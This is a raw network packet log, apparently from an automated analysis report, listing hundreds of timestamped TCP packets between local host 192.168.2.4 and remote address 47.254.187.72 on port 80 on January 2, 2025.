                                                                            Jan 2, 2025 20:34:51.428080082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428088903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428100109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428121090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428121090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.428136110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428138018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.428145885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428153992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.428164959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428173065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.428175926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428185940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428196907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428200960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.428206921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428217888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428227901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428236961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.428239107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428248882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428260088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.428271055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.428294897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.438173056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.438193083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.438204050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.438214064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.438222885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.438225985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.438235998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.438247919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.438252926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.438260078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.438301086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.441338062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441349030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441365957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441378117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441389084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441390038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.441426992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.441454887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441466093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441477060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441485882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.441488028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.441528082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.443701982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.443728924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.443753004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.443773031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.443789959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.443802118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.443813086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.443824053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.443836927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.443842888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.443876028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.446346045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.446366072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.446376085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.446407080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.446434975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.446436882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.446448088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.446459055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.446484089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.446486950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.446502924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.446525097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.446530104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.446615934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.451428890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451443911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451463938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451483011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451494932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451499939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.451505899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451519012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451525927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.451530933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451551914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.451570988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.451596975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451608896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451620102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451631069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451642036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.451642036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451659918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451673031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.451678038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.451704979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.452717066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.452729940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.452742100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.452754021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.452764988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.452764988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.452775002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.452796936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.452800989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.452814102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.452825069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.452837944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.452863932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.453929901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.453972101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.453988075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.453998089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.454008102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.454020023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.454030037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.454065084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.454085112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.454097033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.454108000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.454118967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.454121113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.454137087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.454174995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.506468058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.506485939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.506498098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.506583929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.506607056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.506624937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.506625891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.506637096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.506643057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.506649017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.506660938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.506665945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.507742882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.507742882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.510793924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.510811090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.510823965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.510833979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.510845900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.510862112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.510864019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.510878086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.510900021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.510915041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.512217045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512234926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512247086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512258053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512269020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512279987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512288094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.512290955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512300014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512311935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512322903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512331963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512336969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.512343884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512353897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512365103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512375116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512382984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.512387037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.512402058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.512415886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.512458086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.513884068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.513895988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.513906956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.513917923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.513928890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.513940096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.513947964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.513951063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.513959885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.513978958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514014959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514753103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514770985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514782906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514792919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514803886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514806032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514813900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514825106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514827967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514834881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514846087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514856100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514872074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514873981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514889956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514895916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514905930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514915943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514916897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514928102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514944077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514955997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514966011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514976978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.514977932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.514988899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.515006065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.515069008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.515080929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.515091896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.515095949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.515100956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.515106916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.515129089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.515170097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.525044918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.525100946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.525111914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.525122881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.525134087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.525146008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.525146008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.525156975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.525176048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.525213003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.528204918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528217077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528227091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528238058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528249025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528260946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.528276920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528285027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.528287888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528300047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528309107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.528321981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.528343916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.530482054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.530493021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.530533075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.530540943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.530551910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.530564070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.530575037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.530581951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.530586958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.530596972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.530611992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.530637026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.533122063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.533171892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.533217907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.533226967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.533237934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.533255100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.533257961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.533265114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.533291101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.533301115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.533302069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.533320904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.533344984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.538388968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538399935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538415909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538428068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538438082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538448095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.538450003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538460970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538490057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.538513899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.538599014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538609028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538619995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538631916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538640976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538645029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.538681984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538697958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538702011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.538707972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538718939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538719893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.538732052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538750887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.538753033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.538779974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.539576054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.539628983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.539633036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.539638996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.539657116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.539666891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.539666891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.539678097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.539688110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.539699078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.539701939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.539724112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.539745092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.540865898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.540877104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.540894032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.540904045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.540915966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.540927887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.540930986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.540945053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.540951967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.540955067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.540992022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.593394995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.593420029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.593431950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.593442917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.593455076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.593456984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.593466043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.593480110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.593485117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.593533039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.597717047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597767115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597784996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597790956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.597796917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597806931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597810984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.597822905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.597841978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597855091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.597855091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597867966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597879887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.597891092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.597914934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.598895073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.598915100 CET804973047.254.187.72192.168.2.4
